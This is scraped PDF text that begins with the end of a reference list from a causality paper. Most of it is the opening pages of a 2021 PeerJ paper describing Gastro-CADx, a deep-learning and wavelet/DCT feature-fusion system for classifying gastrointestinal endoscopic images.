19(7):1182–1194 DOI 10.1175/JCLI3653.1. Nagaraj N, Balasubramanian K. 2017a. Dynamical complexity of short and noisy time series. The European Physical Journal Special Topics 226:2191–2204. Nagaraj N, Balasubramanian K. 2017b. Three perspectives on complexity: en- tropy, compression, subsymmetry. The European Physical Journal Special Topics 226(15):3251–3272 DOI 10.1140/epjst/e2016-60347-2. Nagaraj N, Balasubramanian K, Dey S. 2013. A new complexity measure for time series analysis and classification. The European Physical Journal Special Topics 222(3– 4):847–860 DOI 10.1140/epjst/e2013-01888-9. Paydarfar D, Forger DB, Clay JR. 2006. Noisy inputs and the induction of on–off switch- ing behavior in a neuronal pacemaker. Journal of Neurophysiology 96(6):3338–3348 DOI 10.1152/jn.00486.2006. Pearl J. 2009. Causality. Cambridge: Cambridge university press. Pearl J, Mackenzie D. 2018. The book of why: the new science of cause and effect. New York: Basic Books. Rissanen J. 1978. Modeling by shortest data description. Automatica 14(5):465–471 DOI 10.1016/0005-1098(78)90005-5. Schreiber T. 2000. Measuring information transfer. Physical Review Letters 85(2):461–464 DOI 10.1103/PhysRevLett.85.461. Seth AK, Barrett AB, Barnett L. 2015. Granger causality analysis in neuroscience and neuroimaging. Journal of Neuroscience 35(8):3293–3297 DOI 10.1523/JNEUROSCI.4399-14.2015. Shannon CE. 1948. A mathematical theory of communication, Part I, Part II. The Bell System Technical Journal 27:623–656 DOI 10.1002/j.1538-7305.1948.tb00917.x. Stips A, Macias D, Coughlan C, Garcia-Gorriz E, San Liang X. 2016. On the causal structure between CO2 and global temperature. Scientific Reports 6:Article 21691 DOI 10.1038/srep21691. Sugihara G, May R, Ye H, Hsieh C, Deyle E. 2012. Detecting causality in complex ecosystems. Science 338(6106):496–500 DOI 10.1126/science.1227079. Teplan M. 2002. Fundamentals of EEG measurement. Measurement Science Review 2(2):1–11. Veilleux BG. 1976. The analysis of a predatory interaction between Didinium and Paramecium. Master’s thesis, University of Alberta, Edmondton. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 23/24 https://peerj.com http://dx.doi.org/10.1109/TIT.1976.1055501 http://dx.doi.org/10.1103/PhysRevLett.100.144103 http://dx.doi.org/10.1371/journal.pone.0109462 http://dx.doi.org/10.1175/JCLI3653.1 http://dx.doi.org/10.1140/epjst/e2016-60347-2 http://dx.doi.org/10.1140/epjst/e2013-01888-9 http://dx.doi.org/10.1152/jn.00486.2006 http://dx.doi.org/10.1016/0005-1098(78)90005-5 http://dx.doi.org/10.1103/PhysRevLett.85.461 http://dx.doi.org/10.1523/JNEUROSCI.4399-14.2015 http://dx.doi.org/10.1002/j.1538-7305.1948.tb00917.x http://dx.doi.org/10.1038/srep21691 http://dx.doi.org/10.1126/science.1227079 http://dx.doi.org/10.7717/peerj-cs.196 Vicente R, Wibral M, Lindner M, Pipa G. 2011. Transfer entropy: a model-free measure of effective connectivity for the neurosciences. Journal of Computational Neuroscience 30(1):45–67 DOI 10.1007/s10827-010-0262-3. Virmani M, Nagaraj N. 2019. A novel perturbation based compression complexity measure for networks. Heliyon 5(2):e01181 DOI 10.1016/j.heliyon.2019.e01181. Wieczorek A, Roth V. 2016. Causal compression. ArXiv preprint. arXiv:1611.00261. Wiener N. 1956. The theory of prediction. Modern Mathematics for Engineers 1:125–139. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 24/24 https://peerj.com http://dx.doi.org/10.1007/s10827-010-0262-3 http://dx.doi.org/10.1016/j.heliyon.2019.e01181 http://arXiv.org/abs/1611.00261 http://dx.doi.org/10.7717/peerj-cs.196 work_4jahkqj3yzfxjggdfr7jx3jif4 ---- GASTRO-CADx: a three stages framework for diagnosing gastrointestinal diseases GASTRO-CADx: a three stages framework for diagnosing gastrointestinal diseases Omneya Attallah and Maha Sharkas Department of Electronics and Communication Engineering, College of Engineering and Technology, Arab Academy for Science, Technology and Maritime Transport, Alexandria, Egypt ABSTRACT Gastrointestinal (GI) diseases are common illnesses that affect the GI tract. Diagnosing these GI diseases is quite expensive, complicated, and challenging. A computer-aided diagnosis (CADx) system based on deep learning (DL) techniques could considerably lower the examination cost processes and increase the speed and quality of diagnosis. Therefore, this article proposes a CADx system called Gastro-CADx to classify several GI diseases using DL techniques. Gastro-CADx involves three progressive stages. Initially, four different CNNs are used as feature extractors to extract spatial features. Most of the related work based on DL approaches extracted spatial features only. However, in the following phase of Gastro-CADx, features extracted in the first stage are applied to the discrete wavelet transform (DWT) and the discrete cosine transform (DCT). DCT and DWT are used to extract temporal-frequency and spatial-frequency features. Additionally, a feature reduction procedure is performed in this stage. Finally, in the third stage of the Gastro-CADx, several combinations of features are fused in a concatenated manner to inspect the effect of feature combination on the output results of the CADx and select the best-fused feature set. Two datasets referred to as Dataset I and II are utilized to evaluate the performance of Gastro-CADx. Results indicated that Gastro-CADx has achieved an accuracy of 97.3% and 99.7% for Dataset I and II respectively. The results were compared with recent related works. The comparison showed that the proposed approach is capable of classifying GI diseases with higher accuracy compared to other work. Thus, it can be used to reduce medical complications, death-rates, in addition to the cost of treatment. It can also help gastroenterologists in producing more accurate diagnosis while lowering inspection time. Subjects Bioinformatics, Artificial Intelligence, Computer Vision, Data Mining and Machine Learning Keywords Gastrointestinal (GI) diseases, Deep learning, Convolution neural network, Computer aided diagnosis INTRODUCTION Gastrointestinal (GI) disease is considered one of the supreme common diseases that usually infect people, causing complicated health conditions (Du et al., 2019). Based on the degree of injury, GI can approximately split into the precancerous lesion, primary GI cancer and progressive GI cancer, and benign GI diseases (Sharif et al., 2019). Among benign GI diseases are ulcers, gastritis, and bleedings which will not depreciate into cancers in short term. In contrast, precancerous GI injury could depreciate into primary GI cancer How to cite this article Attallah O, Sharkas M. 2021. GASTRO-CADx: a three stages framework for diagnosing gastrointestinal diseases. PeerJ Comput. Sci. 7:e423 DOI 10.7717/peerj-cs.423 Submitted 23 November 2020 Accepted 11 February 2021 Published 10 March 2021 Corresponding author Omneya Attallah, o.attallah@aast.edu Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 30 DOI 10.7717/peerj-cs.423 Copyright 2021 Attallah and Sharkas Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.423 mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.423 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ or even progressive GI cancer, in case it was not accurately diagnosed and treated in time (Du et al., 2019). Annually almost 0.7 million patients are diagnosed with gastric cancer. Since 2017, 135,430 new GI diseases arose in America. A global survey indicated that since 2017, 765,000 deaths occurred due to stomach cancer, 525,000 deaths are due to colon cancer. The poorest situations can be detected in the developing countries (e.g., the Asian countries and the Middle East) (Ali et al., 2019; Khan et al., 2020a). Moreover, among people diseased with GI diseases, 20% of them are from China, 18% from Brazil, 12% from Russia, 20% of EU, and 21% of the US (Sharif et al., 2019). The early diagnosis of GI is essential to reduce medical complications, cost of treatment, and lower death rates. The traditional clinical method used for GI diagnosis is the intestinal biopsy of the GI tract. These biopsy samples are analyzed by medical experts using microscopes to examine the possibility of any cancerous or abnormal cells’ existence. The drawbacks of such a method are being invasive and the necessity of a high degree of proficiency (Ali et al., 2019). In contrast, endoscopic imaging is a lower invasive technique for visualizing the GI tract (Kainuma et al., 2015). The endoscopic process assists the doctor in the recognition and diagnosis of gastric anomalies in their initial stages. Timely detection and diagnosis of chronic medical conditions can be healed with appropriate treatments. Hence, the imaging procedure can be very beneficial for a considerable decrease in medical complications, the cost of treatment, and death-rates, especially, the deaths that happen due to several GI cancers, which could be treated if cancer was discovered in its pre-malignant phase (Hamashima et al., 2015). Although there are numerous advantages in endoscopy, it brings along with it particular trade-offs; for example, the huge number of video frames produced during the screening process of the GI tract. On average, the entire process can take from 45 min to 8 h depending on the aimed GI region and the expertise of the gastroenterologist (Ali et al., 2019). The number of generated frames can reach up to 60,000 images. Most of these frames are redundant and not valuable and only a few images might have some abnormal lesions (Khan et al., 2020b). All these redundant images can be removed by examining each frame of the endoscopic video. Therefore, the manual examination of diseases through such a huge number of images is very challenging as it needs an extensive amount of time to observe the complete number of frames. Besides, at times the anomalous frames can be simply unnoticed by the gastroenterologist which can cause misdiagnosis. Therefore, such medical experts request automated schemes, that can automatically determine possible malignancies by analyzing the entire endoscopic images (Aoki et al., 2019). Computer-aided diagnosis (CADx) are systems utilized for automatic diagnosis of several diseases within various parts of the human body like the brain (Attallah, Sharkas & Gadelkarim, 2019, 2020), breast (Ragab, Sharkas & Attallah, 2019), lung (Attallah, Ragab & Sharkas, 2020), etc. Along with these diseases, CADx has been commonly used to diagnose GI disease in the intense by analyzing endoscopic images (Khan et al., 2020b). Such CADx has several advantages from which the patients, gastroenterologists, and medical students can benefit. These include; the reduction in the examination time of the whole endoscopic frames. Besides, the decrease in the cost of treatment as the lesion will be detected in an early phase. Moreover, CADx will improve the accuracy of the Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 2/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ diagnosis of GI diseases compared to manual examination. Also the inspection time from endoscopic images is to be decreased. Furthermore, it may be used for training medical staff and students without the necessity of an expert (Ali et al., 2019). In a CADx scheme, the diagnosis is carried out using each frame depending on the significant features taken out from the image. Thus, feature extraction is the key step in an accurate diagnosis of medical conditions (Attallah, 2020) like GI diseases (Khan et al., 2020b; Ali et al., 2019; Khan et al., 2019). Several features are calculated using handcrafted techniques in the literature like color-based, texture-based, and some others (Khan et al., 2020b; Ali et al., 2019). Karargyris & Bourbakis (2011) utilized geometric and texture features extracted from SUSAN edge detector and Gabor filter extraction methods to detect small bowel polyps and ulcers. On the other hand, Li & Meng (2012a) used the uniform local binary pattern (LBP) and discrete wavelet transform (DWT). They employed an SVM classifier to detect abnormal tissues. In the same way, the authors in Li & Meng (2012b) detected tumors in the intestine using DWT and LBP. Instead, Yuan & Meng (2014) fuzed the saliency map with the Bag of Features (BoF) technique to identify polyps in endoscopic images. Initially, the authors employed the BoF method to describe the local features by using a scale-invariant feature transform (SIFT) feature vectors using k-means clustering. Next, the saliency map histogram method was utilized to extract salience features. Lastly, both features are combined and utilized to learn an SVM classifier. Later the same authors (Yuan, Li & Meng, 2015) added the complete LBP (CLBP), LBP, uniform LBP (ULBP), and histogram of oriented gradients (HoG) features along with SIFT features to extract additional distinctive texture features. Alternatively, color-based features were extracted in (Ghosh, Fattah & Wahid, 2018; Deeba et al., 2018) for bleeding detection. Recently, the advancement of deep learning (DL) methods has delivered new opportunities to improve the analysis of endoscopic images. CNNs are the most type of networks used in endoscopy (Alaskar et al., 2019). These networks can be used as classifiers or/and feature extractors. Feature extraction methods based on DL techniques have been extensively utilized in the literature (Ghatwary, Zolgharni & Ye, 2019; Kim, Cho & Cho, 2019; Lee et al., 2019). The authors of Khan et al. (2020a) proposed a CADx system to detect ulcers and bleeding GI diseases. Their system extracted deep features from two different layers of VGG-16 CNN. Afterward, these features were fused, and then significant features were selected using an evolutionary search method called PSO. These features were then used to train the SVM classifier. Igarashi et al. (2020) proposed a CADx framework to classify several GI diseases using AlexNet. First, AlexNet extracted spatial features and then classified them into 14 different diseases. The authors of Alaskar et al. (2019) proposed a DL-based CADx that utilized AlexNet and GoogleNet for ulcer detection from low contrast endoscopic videos (WEV). Features extracted from these networks were classified using the fully connected layer of each network separately. AlexNet was also used in (Fan et al., 2018) to detect both erosions and ulcers that are observed in the intestine. He et al. (2018) introduced a framework based on two cascaded CNNs. The first network is VGG-16 CNN which was used for edge detection, whereas the second is the Inception CNN which was used for classification. Similarly, Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 3/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Khan et al. (2020b) used two CNNs, the first one is Recurrent CNN for segmentation, whereas, the second was ResNet and was used for classification. The authors in Yuan & Meng (2017) suggested the use of an image manifold with stacked sparse auto-encoder to recognize polyps in endoscopic images. Instead, the authors in Pei et al. (2017) proposed a CADx system to recognize and assess the small bowel using features extracted from long short-term memory (LSTM). Other research articles suggested the fusion of handcrafted features and DL features. Sharif et al. (2019) proposed a CADx system for classifying GI infections. The authors extracted deep features from VGG-16 and VGG-19 CNNs and fused these features with some geometric features. These fused features were then used as input to a K-nearest neighbors (KNN) classifier. Another system was presented in Ghatwary, Ye & Zolgharni (2019) to detect esophageal cancer. The system fuzed Gabor features and Faster Region-Based CNN (Faster R-CNN). On the other hand, Billah, Waheed & Rahman (2017) fuzed the color wavelet features and CNN features for detecting polyps. The combined features were used later to fed an SVM classifier. The authors in Nadeem et al. (2018) combined features extracted from textural analysis methods such as Haralick and LBP along with VGG-16 CNN DL features. The authors used logistic regression for classification. The authors of Majid et al. (2020) introduced a framework that combined the DCT, DWT, color-based statistical features, and VGG16 DL features for the recognition of several GI diseases. The authors used a genetic algorithm (GA) to select features using the KNN fitness function. Finally, the selected features were used to train an ensemble classifier. A summary of recent related work along with their limitations is shown in Table 1. The main aim of this work is to construct a CADx called Gastro-CADx that is capable of accurately diagnosing more GI diseases than the proposed by others. Though there are various approaches to GI detection and classification in the literature, there exist some weaknesses among these methods which are summarized in table. Gastro-CADx tries to overcome the limitations found in related studies discussed in Table 1 through three cascaded stages. First of all, the majority of the current methods studied the detection and classification of a few types of GI anomalies, disease, or anatomical landmark. But, our proposed Gastro-CADx is an automatic highly accurate system to classify several GI diseases and anatomical landmarks. Some of the related studies are based on small dataset or used only one dataset to test the efficiency of their classification model, while Gastro-CADx is validated using two large datasets of several GI diseases. The few articles that classified several GI diseases achieved low accuracy, not reliable, or used only one type of CNN, whereas, Gastro-CADx is an accurate and reliable system that used more four CNNs. This article in the first stage, Gastro-CADx studies several CNN based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of CNNs. The previous studies were either based only on an end-to-end deep learning which has very high computational cost, used only spatial features extracted from CNNs or only handcrafted feature extractions, but Gastro-CADx is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well not only Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 4/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Table 1 A summary of recent related studies. Article Purpose Class Method Accuracy (%) Limitation Khan et al. (2020b) Ulcer, polyp, bleeding detection 4 RCNN, ResNet101, and SVM 99.13 � Used only spatial features. � Low segmentation accuracy for the ulcer regions. � Fail for the segmentation of polyp and bleeding regions. Khan et al. (2020a) Ulcer, and bleeding detection 3 VGG-16, PSO, and SVM 98.4 � Limited classes � Used only spatial features. � High computational cost Igarashi et al. (2020) Classify several GI diseases 14 AlexNet 96.5 � Used only spatial features. � The training or test data included chosen images of gastric cancer lesions, which could cause a selection bias. � Has high computational cost � Cannot be used in real-time examinations Alaskar et al. (2019) Ulcer detection 2 AlexNet & Google Net 97.143 � Limited classes. � Used only spatial features Owais et al. (2019) Classification of multiple GI diseases 37 ResNet-18 and LSTM 89.95 � High computational cost. � Used individual type of features � Low accuracy Fan et al. (2018) Ulcer and Erosion detection 2 AlexNet 95.16 95.34 � Limited classes. � Used only spatial features. � Used only one type of CNN features � The CADx was applied separately for ulcer and Erosion detection He et al. (2018) Hookworm detection 2 VGG-16 and Inception 88.5 � Limited classes. � Used only spatial features � Low accuracy Yuan & Meng (2017) Polyps detection 2 Stacked sparse auto-encoder with image manifold 98 � Limited classes. � Used only spatial features Pei et al. (2017) Bowel detection and assessment 2 LSTM and PCA 88.8 � Limited classes. � Used only temporal features. � Used only one type of CNN features � Low accuracy � Small dataset (Continued) Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 5/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ end-to-end based DL. This appears clearly in the second stage of Gastro-CADx. It extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the DL features extracted in the first stage. This reduces the high computational cost of end-to-end DL techniques. Previous related studies indicated that CNN representations have improved the performance and the abstract level for the automatic detection and classification of GI diseases (Majid et al., 2020; Khan et al., 2020b; Yuan & Meng, 2017). Nevertheless, the fusion of CNN features with handcrafted variables could enhance diagnostic accuracy (Majid et al., 2020; Table 1 (continued). Article Purpose Class Method Accuracy (%) Limitation Sharif et al. (2019) Ulcer, and bleeding detection 3 VGG-16, VGG-19, geometric features, KNN 99.42 � Limited classes. � Small dataset. � Used spatial and geometric features only Ghatwary, Ye & Zolgharni (2019) Esophageal cancer detection 2 Gabor Filter. faster R-CNN, and SVM 95 � Limited classes. � Used only one type of CNN features � Used spatial and textural based -Gabor features only. � High computational cost Billah, Waheed & Rahman (2017) Polyps detection 2 Color based DWT, CNN, and SVM 98.65 � Limited classes. � Used only one type of CNN features � Used spatial and color based –DWT only � Small dataset Nadeem et al. (2018) Classification of several GI diseases 8 VGG-19, Haralick and LBP texture analysis, and logistic regression 83 � Low accuracy � Used only one type of CNN features � Used spatial features based on CNN and textural analysis only Majid et al. (2020) Bleeding, esophagitis, polyp, and ulcerative- colitis classification 5 DCT, color based statistical features, DWT, VGG-16, GA, and E 96.5 � High computational cost. � Used only one type of CNN DL features Nguyen et al. (2020) Classifying images to normal and abnormal 2 DenseNet, Inception, and VGG-16 70.7 � Classify images to either normal or abnormal. � Did not classify several GI diseases. � Low accuracy Owais et al. (2020) Classification of multiple GI diseases 37 DenseNet and LSTM 95.75 � High computational cost. � Used individual type of features Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 6/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Shi et al., 2018). Therefore, in the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal- frequency, and spatial-frequency features. This stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. It can also reduce the computational cost compared to end-to-end DL methods. The previous contributions are summarized to: � Proposing an automatic and accurate CADx system called Gastro-CADx based on three stages to classify several GI diseases and anatomical landmarks. � The system is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well. � In the first stage, Gastro-CADx studies several CNN based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of CNNs. � In the second stage, Gatro-CADx extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the DL features extracted in the first stage. � Also, in the second stage, Gastro-CADx tries to minimize the problem of computational time using only reduced dimensions of features. � In the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal-frequency, and spatial-frequency features. � The third stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. � Gastro-CADx is validated using two large datasets of several GI diseases. � Creating an accurate automatic diagnostic system that is reliable compared to related CADx systems. MATERIALS AND METHODS Dataset description This article employs two datasets to evaluate the performance of Gastro-CADx. The first dataset used in this article is called Kvasir (Pogorelov et al., 2017), and denoted as Dataset I. It consists of 4,000 images containing eight different GI classes. Three classes demonstrating anatomical landmarks, three demonstrating pathological states, and two associated with lesion-removal. The three anatomical landmark categories are pylorus, z-line, and cecum. The three diseased states are esophagitis, polyps, and ulcerative colitis. The two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. The images are of different sizes from 720 × 576 up to 1,920 × 1,072 pixels. Some of these images include a green region illustrating the location and shape of the endoscope within the intestine. This information may be significant for later investigations (thus included) but must be wielded with care for the detection of the endoscopic findings. Figure 1 shows different image samples of different GI diseases. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 7/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ The second dataset is called HyperKvasir (Borgli et al., 2020) and named Dataset II. The images and videos of this dataset were acquired using standard endoscopy equipment from Olympus (Olympus Europe, Hamburg, Germany) and Pentax (Pentax Medical Europe, Hamburg, Germany) at a Norwegian hospital from 2008 to 2016. The dataset consists of 10,662 labeled images and 23 classes. These classes are unbalanced; therefore, we chose only 10 balanced classes to construct Gastro-CADx. Four classes demonstrating anatomical landmarks, three demonstrating pathological states, one demonstrating quality of mucosal views, and two associated with lesion-removal. The three anatomical landmark categories are pylorus, z-line, pylorus, and cecum. The three pathological states are esophagitis, polyps, and ulcerative colitis. The two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. The one demonstrating the quality of mucosal views is bowel quality. Figure 2 shows samples of images included in the dataset. Deep convolutional neural networks architectures The popular type of DL approaches that is generally utilized for solving image-related classification problems in the health informatics field is the convolutional neural network (CNN) (Jin et al., 2020). In this article, four CNNs are utilized including; AlexNet, ResNet-50, DarkNet-19, and DenseNet-201 constructions. As it can be noticed from Table 1 that most related studies used AlexNet, ResNet and VGG CNNs. We did not use VGG as it has very high computational cost and number of parameters. Also, the features extracted from this network is of very huge size (Bi et al., 2020; Ertosun & Rubin, 2015; Su et al., 2020). Although, AlexNet is one of the oldest architectures, but it is still being used due to its acceptable performance. This is because it has efficient computation ability and Figure 1 Image samples of KASVIR dataset: (A) Dyed-Lifted-Polyp, (B) Dyed-Resection-Margin, (C) Esophagitis, (D) Normal-z-line, (E and F) Normal-Cecum, Polyps, (G) Normal-Pylorus, and (H) Ulcerative-Colitis. Image credit: Michael Riegler. Full-size DOI: 10.7717/peerj-cs.423/fig-1 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 8/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-1 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ performs well with color images like these used in this article well (Wang, Xu & Han, 2019). We employed more recent CNNs like DarkNet and DenseNet architectures. To our own knowledge darknet was not used in the literature, whereas, only few articles used DenseNet for classifying GI diseases but has several drawbacks in their proposed methods. Therefore, we used these two new CNNs architectures to test their performance and ability to classify multiple GI diseases from endoscopic images. The size of the input and output layers of the four networks employed used in the proposed method is shown in Table 2. AlexNet The structure of AlexNet CNN was presented in 2012 by Krizhevsky, Sutskever & Hinton (2012). This construction won the ImageNet Large-Scale Visual Recognition Challenge in 2012. The structure of AlexNet includes 23 layers corresponding to 5 convolutional layers, 5 rectified linear unit (ReLu) layers, 2 normalization layers, 3 pooling layers, 3 fc layers, a probabilistic layer using softmax units, and a classification layer ending in 1,000 neurons for 1,000 categories (Attallah, Sharkas & Gadelkarim, 2020). DarkNet-19 DarkNet was first introduced in 2017 by Redmon & Farhadi (2017). DarkNet-19 is a CNN that is utilized as the spine of YOLO-V2. It commonly employs 3 × 3 filters and pairs Figure 2 Image samples of Hyperkvasir dataset. (A) Bowel quality, (B) Normal Cecum, (C) Dyed-Lifted-Polyp, (D) Dyed-Resection-Margin, (E) Esophagitis, (F) Polyps, (G) Polyrous, (H) Retroflex stomach, (I) Ulcerative-Colitis, and (J) Normal-z-line. Full-size DOI: 10.7717/peerj-cs.423/fig-2 Table 2 A summary of the four CNNs architectures. CNN Structure Number of layers Size of input Size of output AlexNet 23 227 × 227 4,096 ResNet-50 50 224 × 224 2,048 DarkNet-19 19 256 × 256 8 and 10 DenseNet-201 201 224 × 224 1,920 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 9/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-2 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ the number of channels after each pooling stage. DarkNet-19 utilizes global average pooling to perform classifications in addition to 1 × 1 filters to reduce the feature demonstration between 3 × 3 convolutions. Batch Normalization is applied to regularize the classification model batch, make the training process more stable, and accelerate convergence. Darknet-19 consists of 19 convolutional layers and 5 max-pooling layers. ResNet-50 ResNet architecture was first introduced in 2016. The essential constructing block of the ResNet is the residual block which was suggested by He et al. (2016). The residual block offers shortcuts associations within the convolution layers, which can assist the network to step some convolution layers at a time. In other words, the residual block recommends two choices, it may attain a set of functions on the input, or it can permit this stage. Therefore, ResNet construction is supposed to be more effective than other CNNs such as AlexNet and GoogleNet as stated in Attallah, Sharkas & Gadelkarim (2020). In this study, ResNet-50 is used which consists of 49 convolutional layers and one fc layer. DenseNet-201 The latest research has revealed that CNNs can be significantly deeper, more accurate, and effective to learn when they consist of smaller connections between layers near the input and those adjacent to the output. This finding motivated Huang et al. (2017) to propose the Dense Convolutional Network (DenseNet). DenseNet joins every layer to each other layer in a feed-forward manner. While conventional CNNs with M layers have M connections—one amid every layer and its succeeding layer, DenseNet has M(M + 1)/2 straight connections. For every layer, the feature-maps of all previous layers are utilized as inputs, and its feature-maps are utilized as inputs into all following layers. DenseNet has numerous benefits such as their ability to lessen the vanishing-gradient issue, reinforce feature dissemination, boost feature reprocesses, and considerably decrease the number of parameters. In this article, DenseNet-201 is used which has 201 layers deep. Proposed Gastro-CADx An efficient hybrid CADx system called Gastro-CADx is proposed to classify several GI classes from endoscopic images. Gastro-CADx involves three steps including, the image preprocessing step, followed by feature extraction, reduction and fusion step, and finally a classification step. Initially, several augmentation processes are utilized to raise the number of images in the datasets. Also, images are resized. In the feature extraction, reduction, and fusion step, three stages are performed to construct Gastro-CADx. In the first stage, valuable deep features are extracted from four CNNs including (ResNet-50, AlexNet, DenseNet-201, and DarkNet-19). In the second stage, two handcrafted features are used to extract features from the spatial DL features extracted in the first stage. These handcrafted features are textural analysis based features representing temporal-frequency and spatial-frequency features. The dimension of these extracted features is reduced in this stage. Afterward, is the third stage of the Gastro-CADx, where several reduced features are fuzed in a concatenated manner. Finally, is the classification step in which machine Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 10/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ learning classifiers are used to identify several GI classes. Figure 3 represents the block diagram of Gastro-CADx. Image preprocessing step The endoscopic images of both datasets are resized according to the size of the input layer of each CNN (Attallah, Ragab & Sharkas, 2020) shown in Table 2. Subsequently, these frames are augmented. The augmentation process is essential to raise the number of images (Attallah, Sharkas & Gadelkarim, 2020; Ragab & Attallah, 2020). This technique is performed because most likely the models which are learned with an insufficient quantity of frames may over-fit (Ravì et al., 2016; Attallah, Sharkas & Gadelkarim, 2020). The augmentation techniques utilized in this article to produce new endoscopic images from the training data are flipping, translation, transformation, and rotating (Talo et al., 2019; Attallah, Ragab & Sharkas, 2020). Each frame is flipped and translated in x and y directions with pixel range (−30, 30) (Attallah, Ragab & Sharkas, 2020). Furthermore, each endoscopic image is rotated with an angle range (0–180) degrees (Ragab & Attallah, 2020). Feature extraction, reduction, and fusion step Gastro-CADx is based on three stages. The first stage is the DL feature extraction stage. The second is the handcrafted feature extraction and the reduction stage. Finally is the third stage known as the fusion stage. Deep learning feature extraction stage (First stage of Gastro-CADx) Pre-trained CNNs trained using the endoscopic frames are used to accomplish feature extraction or classification processes. During the feature mining process, valuable DL features are mined from the CNNs. Instead of utilizing the CNNs for classification, DL Figure 3 The block diagram of the proposed Gastro-CADx. Full-size DOI: 10.7717/peerj-cs.423/fig-3 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 11/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-3 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ variables are pulled out from the fully connected layer called “fc7” as in Attallah, Ragab & Sharkas (2020), the “global average pooling 2D layer” (fifth pooling layer), and the last average pooling layer of the AlexNet, ResNet-50, DarkNet, and DenseNet constructions as in (Ragab & Attallah, 2020). The DL features size are 4,096, 2,048, 8 or 10, and 1,920 for AlexNet, ResNet-50, DarkNet-19, and DenseNet-201 respectively. Handcrafted feature extraction and reduction stage (Second stage of gastro-CADx)Hand- crafted feature extraction In this stage, time-frequency and spatial-frequency features based on textural analysis are determined from the DL features extracted in the previous stage. The textural features include the coefficients of the discrete wavelet transform (DWT) and the discrete cosine transform (DCT). Each feature method is discussed below. We employed DWT and DCT as they are popular feature extraction method based on textural analysis. One of the main benefit of DCT is its capability to spatially alter to characteristics of an image for instance discontinuities and changing frequency manner (Bennet, Arul Ganaprakasam & Arputharaj, 2014). It offers time-frequency representation of an image. Also, DCT has several advantages, first of all it prevents complicated calculation and presents simplicity of execution in practical purposes. Furthermore, DCT is capable of effectively managing the phase removing problem and demonstrates a powerful energy compaction estate (Imtiaz & Fattah, 2010; Rashidi, Fallah & Towhidkhah, 2012). DWT and DCT are the utmost common approach to extract textural features in the medical image processing area (Lahmiri & Boukadoum, 2013; Srivastava & Purwar, 2017; Mishra et al., 2017; Anthimopoulos et al., 2014; Benhassine, Boukaache & Boudjehem, 2020). Textural analysis based methods are useful in extracting texture features from images which is equivalent to simulating human visual learning procedure. It is widely used in medical image processing (Attallah, 2021; Lahmiri & Boukadoum, 2013; Anwar et al., 2020; Castellano et al., 2004). � Discrete wavelet transform (DWT) is a widely used feature extraction method. DWT examines both signals and images (Lahmiri & Boukadoum, 2013; Srivastava & Purwar, 2017). It offers a temporal-frequency representation of an image or signal through decomposing them with the help of a group of orthogonal basis functions (Ortho-normal). Images are of two dimensions; therefore 2-D DWT is used to decompose the image (Attallah, Sharkas & Gadelkarim, 2019). One dimensional DWT is employed on each DL feature set distinctly which results in four groups of coefficients (Ragab & Attallah, 2020). The four groups generated after the 1-D DWT are known as three detail coefficients, CD1, and approximation coefficients, CA1. Detail coefficients consist of the diagonal, vertical, and horizontal coefficients, correspondingly. � Discrete Cosine Transform (DCT) is frequently used to transform images into basic frequency components. It displays data as a sum of cosine functions oscillating at different frequencies (Aydoğdu & Ekinci, 2020). Generally, the DCT is applied to the imaged features to attain the DCT coefficients. The DCT coefficients are separated into three sets, known as low frequencies called (DC coefficients), middle frequencies, and high frequencies called (AC coefficients). High frequencies characterize noise and Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 12/36 